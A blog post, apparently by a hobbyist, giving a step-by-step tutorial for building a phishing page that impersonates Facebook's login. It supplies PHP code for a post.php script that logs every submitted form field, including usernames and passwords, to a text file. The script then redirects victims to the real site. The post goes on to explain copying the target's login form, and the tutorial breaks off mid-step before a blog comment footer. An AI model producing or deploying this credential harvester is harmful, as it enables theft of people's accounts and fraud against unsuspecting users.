Today I put togeather a little phishing tutorial for those who dont know how to
make one. Follow these simple steps and soon enough you'll be phishing any site you want. I used facebook as an example.
1.Start out by gathering all the files you will need. (Post.php and and index file)
Post.php-Open up notepad, and type or paste in the following code
header ('Location: Link here');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Were it says you're link here type in the link of the page you want to get passwords for
(example)
header ('Location: www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Next, save it as post.php
_________________________
All set with that now for the index file. Go to the websight you're phishing on, right
click,and click view page source. When that is complete press "ctr+F" aka find
type in action
you will see a line like this
No comments:
Post a Comment